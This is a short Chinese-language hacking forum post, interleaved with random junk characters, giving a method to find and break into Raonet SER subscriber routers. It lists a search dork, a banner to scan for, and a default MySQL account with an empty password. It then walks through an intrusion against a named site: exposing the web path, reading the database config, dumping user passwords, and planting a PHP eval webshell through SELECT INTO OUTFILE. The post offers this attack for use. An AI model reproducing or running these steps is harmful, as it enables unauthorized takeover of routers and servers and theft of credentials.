寻找存在漏洞的路由器方法:
% J7 q _8 a6 h2 E- X: G/ r
% M: r7 l j& k& i# b1:google搜索'Raonet Subscriber Ethernet Router': @% B0 K" h. {0 U7 Q
7 W! H" T& m8 H% R6 \0 l2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001# H* O& q0 t0 p3 z- N
I/ | g5 v* e! { N$ E
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
J' [' C8 {. Q5 B" P. ~+ Q$ y+ p% T3 ?0 l/ n0 p5 e
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. K# r6 m2 D- {( u: P: @2 I, G7 @5 x$ n6 N0 V4 K5 E
1 w: u; A) s: Q, Z- u c/ [) B
1 x* q4 O% C' a" d( B
入侵步骤:6 c& m% x( s- m; P8 h
0 A5 r& Y/ ?3 d, q+ |* ]; H6 m1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 F8 o8 d. A# g, I O' ?+ g1 a
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
: j/ y: d9 @% q3:得到密码后连接,查看GUI管理密码:
. _$ s1 `1 t% o: Yuse ser_500
" T" [; @2 D- K/ [select id,passwd from user;
, o; [+ \$ i6 P1 W2 ~6 k4:通过数据库写入webshell,执行命令:1 F5 X+ ~8 R+ ~# J7 e
use mysql;) W* e$ ^9 p- i* }( `% f% h- W
create table ok(cmd TEXT);1 q: y) A# Q& j+ v, F7 W
insert into ok values("<?php @eval($_POST[cmd])?>");
& B* E2 v+ @, ^6 Iselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";: O' X6 Y W# x; E: B- b
drop table ok;
+ q2 Q, t! P* D4 ^9 S w& ^' A9 h1 c# Z/ m, D5 q" W
5:连接后门shell.php 3 q0 e5 R: O2 U& Q1 P
. ?. D- o: D$ T" Q% Y& l2 b4 g+ D
6. 搞定!, S8 {' _) Z& w1 l. x+ k+ g
+ e l* l8 i2 X/ F6 K# o0 d |